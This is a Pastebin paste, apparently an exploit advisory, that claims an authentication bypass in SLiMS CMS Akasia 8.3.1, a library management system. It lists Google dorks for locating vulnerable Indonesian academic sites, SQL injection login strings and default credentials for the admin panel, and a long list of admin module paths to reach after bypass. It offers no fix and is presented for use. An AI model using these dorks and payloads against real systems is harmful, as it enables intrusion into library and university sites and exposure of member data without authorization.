API tools faq
paste
Advertisement
KingSkrupellos

Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability

KingSkrupellos
May 22nd, 2019
729
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.52 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 20/05/2019
  7. # Vendor Homepage : slimsetd.id - slims.web.id
  8. # Software Download Link : slims.web.id/goslims/?wpdmpro=slims-8-3-1-akasia
  9. # Software Information Link : foss4lib.org/package/senayan-library-management-system-slims/release/8.3.1
  10. # Software Version : 8.3.1
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks :
  15. intext:Template By Erwan Setyo Budi. Powered By SLiMS and ShapeBootstrap. site:ac.id
  16. intext:Powered By SETIADI and ShapeBootstrap. site:ac.id
  17. # Vulnerability Type :
  18. CWE-285 [ Improper Authorization ]
  19. CWE-284 [ Improper Access Control ]
  20. CWE-592 [ Authentication Bypass Issues ]
  21. CWE-287 [ Improper Authentication ]
  22. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  23. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  24. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  25.  
  26. ####################################################################
  27.  
  28. # Description about Software :
  29. ***************************
  30. Setiadi is an automation system that serves to manage repository such as thesis and
  31. dissertation. Setiadi is built based on SLiMS (Senayan Library Management System).
  32. Setiadi is an open source automation, licensed under GPL v3, built using PHP
  33. and MySQL database.
  34.  
  35. SENAYAN Library Management System (SLiMS) version 8 Codename Akasia
  36. SLiMS is free open source software for library resources management
  37. (such as books, journals, digital document and other library materials) and
  38. administration such as collection circulation, collection management, membership,
  39. stock taking and many other else.
  40.  
  41. ####################################################################
  42.  
  43. # Impact :
  44. ***********
  45. The software does not restrict or incorrectly restricts access to a resource
  46. from an unauthorized actor.
  47.  
  48. The software does not perform or incorrectly performs an authorization check when
  49. an actor attempts to access a resource or perform an action.
  50.  
  51. When an actor claims to have a given identity, the software does not prove or
  52. insufficiently proves that the claim is correct.
  53.  
  54. Assuming a user with a given identity, authorization is the process of determining whether
  55. that user can access a given resource, based on the user's privileges and any permissions
  56. or other access-control specifications that apply to the resource.
  57.  
  58. When access control checks are not applied consistently - or not at all - users are able
  59. to access data or perform actions that they should not be allowed to perform.
  60. This can lead to a wide range of problems, including information exposures,
  61. denial of service, and arbitrary code execution.
  62.  
  63. ####################################################################
  64.  
  65. # Authentication Bypass / Improper Access Control / Improper Authorization Exploit :
  66. **************************************************************************
  67. Admin Panel Login Path :
  68. ************************
  69. /index.php?p=login
  70. /admin
  71.  
  72. Admin Username :
  73. admin
  74. admin' --
  75. '=''or'
  76. ' or 1=1 limit 1 -- -+
  77. anything' OR 'x'='x
  78.  
  79. Admin Password :
  80. admin
  81. admin' --
  82. '=''or'
  83. ' or 1=1 limit 1 -- -+
  84. anything' OR 'x'='x
  85.  
  86. Useable Admin Control Panel Links Exploits :
  87. ******************************************
  88. /admin/modules/system/app_user.php?changecurrent=true&action=detail
  89. /admin/index.php?mod=bibliography
  90. /admin/modules/bibliography/index.php?action=detail
  91. /admin/modules/bibliography/item.php
  92. /admin/modules/bibliography/checkout_item.php
  93. /admin/modules/bibliography/z3950sru.php
  94. /admin/modules/bibliography/z3950.php
  95. /admin/modules/bibliography/p2p.php
  96. /admin/modules/bibliography/dl_print.php
  97. /admin/modules/bibliography/item_barcode_generator.php
  98. /admin/modules/bibliography/marcexport.php
  99. /admin/modules/bibliography/marcimport.php
  100. /admin/modules/bibliography/printed_card.php
  101. /admin/modules/bibliography/export.php
  102. /admin/modules/bibliography/import.php
  103. /admin/modules/bibliography/item_export.php
  104. /admin/modules/bibliography/item_import.php
  105. /admin/index.php?mod=circulation
  106. /admin/modules/circulation/index.php?action=start
  107. /admin/modules/circulation/quick_return.php
  108. /admin/modules/circulation/loan_rules.php
  109. /admin/modules/reporting/customs/loan_history.php
  110. /admin/modules/reporting/customs/overdued_list.php
  111. /admin/modules/reporting/customs/reserve_list.php
  112. /admin/index.php?mod=membership
  113. /admin/modules/membership/index.php
  114. /admin/modules/membership/index.php?action=detail
  115. /admin/modules/membership/member_type.php
  116. /admin/modules/membership/member_card_generator.php
  117. /admin/modules/membership/export.php
  118. /admin/modules/membership/import.php
  119. /admin/index.php?mod=master_file
  120. /admin/modules/master_file/index.php
  121. /admin/modules/master_file/rda_cmc.php?type=content
  122. /admin/modules/master_file/rda_cmc.php?type=media
  123. /admin/modules/master_file/rda_cmc.php?type=carrier
  124. /admin/modules/master_file/publisher.php
  125. /admin/modules/master_file/supplier.php
  126. /admin/modules/master_file/author.php
  127. /admin/modules/master_file/topic.php
  128. /admin/modules/master_file/location.php
  129. /admin/modules/master_file/news_type.php
  130. /admin/modules/master_file/place.php
  131. /admin/modules/master_file/item_status.php
  132. /admin/modules/master_file/coll_type.php
  133. /admin/modules/master_file/doc_language.php
  134. /admin/modules/master_file/label.php
  135. /admin/modules/master_file/frequency.php
  136. /admin/modules/master_file/p2pservers.php
  137. /admin/modules/master_file/item_code_pattern.php
  138. /admin/modules/master_file/author.php?type=orphaned
  139. /admin/modules/master_file/topic.php?type=orphaned
  140. /admin/modules/master_file/publisher.php?type=orphaned
  141. /admin/modules/master_file/place.php?type=orphaned
  142. /admin/index.php?mod=stock_take
  143. /admin/modules/stock_take/index.php
  144. /admin/modules/stock_take/init.php
  145. /admin/modules/system/index.php
  146. /admin/index.php?mod=system
  147. /admin/modules/system/envinfo.php
  148. /admin/modules/system/ucsetting.php
  149. /admin/modules/system/theme.php
  150. /admin/modules/system/content.php
  151. /admin/modules/system/biblio_indexes.php
  152. /admin/modules/system/module.php
  153. /admin/modules/system/app_user.php
  154. /admin/modules/system/user_group.php
  155. /admin/modules/system/shortcut.php
  156. /admin/modules/system/holiday.php
  157. /admin/modules/system/barcode_generator.php
  158. /admin/modules/system/sys_log.php
  159. /admin/modules/system/backup.php
  160. /admin/index.php?mod=reporting
  161. /admin/modules/reporting/index.php
  162. /admin/modules/reporting/loan_report.php
  163. /admin/modules/reporting/member_report.php
  164. /admin/modules/reporting/customs/class_recap.php
  165. /admin/modules/reporting/customs/titles_list.php
  166. /admin/modules/reporting/customs/item_titles_list.php
  167. /admin/modules/reporting/customs/item_usage.php
  168. /admin/modules/reporting/customs/loan_by_class.php
  169. /admin/modules/reporting/customs/member_list.php
  170. /admin/modules/reporting/customs/member_loan_list.php
  171. /admin/modules/reporting/customs/loan_history.php
  172. /admin/modules/reporting/customs/due_date_warning.php
  173. /admin/modules/reporting/customs/overdued_list.php
  174. /admin/modules/reporting/customs/staff_act.php
  175. /admin/modules/reporting/customs/visitor_report.php
  176. /admin/modules/reporting/customs/visitor_report_day.php
  177. /admin/index.php?mod=chat
  178. /admin/index.php?mod=serial_control
  179. /admin/modules/serial_control/index.php
  180.  
  181. ####################################################################
  182.  
  183. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  184.  
  185. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!